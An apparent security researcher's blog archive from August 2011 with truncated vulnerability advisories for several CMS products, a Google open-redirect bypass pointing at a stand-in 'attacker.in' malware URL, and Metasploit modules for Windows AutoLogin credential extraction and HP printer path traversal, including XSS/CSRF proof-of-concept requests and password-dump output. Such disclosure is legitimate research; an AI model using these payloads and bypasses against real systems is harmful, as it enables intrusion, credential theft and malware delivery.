Posts

Showing posts from August, 2011

Google: Malware URL Redirection (Google Arbitrary URL Redirect Vulnerability)

The following link will issue URL Redirect Notice:
http://www.google.com/url?sa=t&url=http%3A%2F%2Fattacker.in%2Fmalware_exists_in_this_page%2F

And this will bypass the notice:
http://www.google.com/url?sa=t&url=http%3A%2F%2Fattacker.in%2Fmalware_exists_in_this_page%2F&usg=AFQjCNEBtpLqGPICIMz5TJZqfNsZKtHbRg

The above bypass link will last as long as Google doesn't change its internal algorithm that compares the hash against the provided URL.  In one way, attackers could let Google search engine crawl their malicious page and calculate "usg" value on behalf of them. In another way, they could simply copy the link from Redirect Notice page which already contains calculated "usg" value.
Google Security Team responded that Google blocks known malware URLs and fixing of this issue is unnecessary.
Here's a way how attacker will bypass the Google's carefully monitored URL Redirector:
1. Attacker prepares a Proxy link (P1) that redirects to a malware doma…

Jcow CMS 4.x:4.2 <= , 5.x:5.2 <= | Arbitrary Code Execution

1. OVERVIEW Jcow CMS versions (4.x: 4.2 and lower, 5.x: 5.2 and lower) are vulnerable to Arbitrary Code Execution. 2. BACKGROUND Jcow is a flexible Social Networking software written in PHP. It can help you to build a social network for your interests and passions, a member community for your existing website and a social networking site like facebook/myspace/twitter. 3. VULNERABILITY DESCRIPTION The parameter "attachment" is not properly sanitized upon submission to /index.php, which allows attacker to execute arbitrary PHP code of his own. 4. VERSIONS AFFECTED Free version: 4.x: 4.2 and lower Commercial version: 5.x: 5.2 and lower) 5. PROOF-OF-CONCEPT/EXPLOIT http://dev.metasploit.com/redmine/attachments/1660/jcow_eval.rb jcow 4.2.1: file: /includes/libs/ss.inc.php line: 167 $app = $_POST['attachment']; if (strlen($app) && $app != 'status') { include_once('modules/'.$app.&…

Jcow CMS 4.2 <= | Cross Site Scripting

1. OVERVIEW Jcow CMS 4.2 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Jcow is a flexible Social Networking software written in PHP. It can help you to build a social network for your interests and passions, a member community for your existing website and a social networking site like facebook/myspace/twitter. 3. VULNERABILITY DESCRIPTION The parameter "g" is not properly sanitized upon submission to /index.php, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Jcow CMS 4.2 and lower 5. PROOF-OF-CONCEPT/EXPLOIT File : /includes/libs/member.module.php: Line 605: http://[target]/index.php?p=member/signup&email=&username=&password=&fullname=&birthyear=1991&birthmonth=01&birthday=01&gender=0&location=Myanmar++&ab…

Concrete CMS 5.4.1.1 <= Cross Site Scripting

1. OVERVIEW Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Concrete5 makes running a website easy. Go to any page in your site, and a editing toolbar gives you all the controls you need to update your website. No intimidating manuals, no complicated administration interfaces - just point and click. 3. VULNERABILITY DESCRIPTION The rcID parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED CMS 5.4.1.1 <= 5. PROOF-OF-CONCEPT/EXPLOIT vulnerable parameter: rcID <form action="http://[target]/Concrete/index.php/login/do_login/" method="post"> <input type="hidden" name="uName" value="test" /> <input type="hidden" name="uPasswo…

[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor

http://dev.metasploit.com/redmine/attachments/1642/windows_autologin.rb

This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2K till current Seven) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.


meterpreter > run post/windows/gather/credentials/windows_autologin [*] Running against John-PC @ session 1 [+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd [+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p [*] Storing data... [*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt

Elgg 1.7.10 <= | Multiple Vulnerabilities

1. OVERVIEW The Elgg 1.7.10 and lower versions are vulnerable to Cross Site Scripting and SQL Injection. 2. BACKGROUND Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php) 3. VULNERABILITY DESCRIPTION The "internalname" parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The "tag_names" is not properly sanitized, which allows attacker to conduct SQL Injection at…

WebsiteBaker 2.8.1 <= Arbitrary File Upload Vulnerability

1. OVERVIEW WebsiteBaker 2.8.1 and lower versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS). Create new templates within minutes - powered by (X)HTML, CSS and jQuery. With WebsiteBaker it's quite natural your site is W3C-valid, SEO-friendly and accessible - there are no limitations at all. 3. VULNERABILITY DESCRIPTION WebsiteBaker 2.8.1 and lower versions contain a flaw related to the /admin/media/upload.php script failing to restrict uploaded files with extensions - .htaccess, .php4, .php5, .phtml. This may allow an attacker to execute arbitrary PHP code. User account to WebsiteBaker admin backend is required. Attacker could gain access it by way of either brute force or CSRFing to currently-logged in admin users. 4. VERSIONS AFFECTED 2.8.1 <= 5. SOLUTION Upgrade to 2.8.2 or hig…

WebsiteBaker 2.8.1 <= Cross Site Request Forgery (CSRF) Vulnerability

1. OVERVIEW WebsiteBaker 2.8.1 and lower versions are vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND WebsiteBaker is a PHP-based Content Management System (CMS) designed with one goal in mind: to enable its users to produce websites with ease. 3. VULNERABILITY DESCRIPTION WebsiteBaker 2.8.1 and lower versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFE…

Mambo CMS 4.6.x (4.6.5) | SQL Injection

Mambo CMS 4.6.x (4.6.5) | SQL Injection


1. OVERVIEW

Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection.


2. BACKGROUND

Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites.


3. VULNERABILITY DESCRIPTION

The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct  SQL Injection attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.


4. VERSIONS AFFECTED

Tested on Mambo CMS 4.6.5


5. PROOF-OF-CONCEPT/EXPLO…

[Metasploit] New Modules: hp_printer_pjl_traversal & hp_printer_pjl_cmd

http://www.exploit-db.com/exploits/17635/
http://www.exploit-db.com/exploits/17636/
_____________________________________________________
hp_printer_pjl_traversal:This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100.
With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.

msf auxiliary(hp_printer_pjl_traversal) > show options Module options (auxiliary/admin/hp_printer_pjl_traversal): Name Current Setting Required Description ---- --------------- -------- ----------- INTERACTIVE true no Enter interactive mode [msfconsole Only] RHOST 202.138.16.21 yes The target address RPATH /hp yes The remote filesystem path to browse or read RPORT 9100 yes The target port msf auxiliar…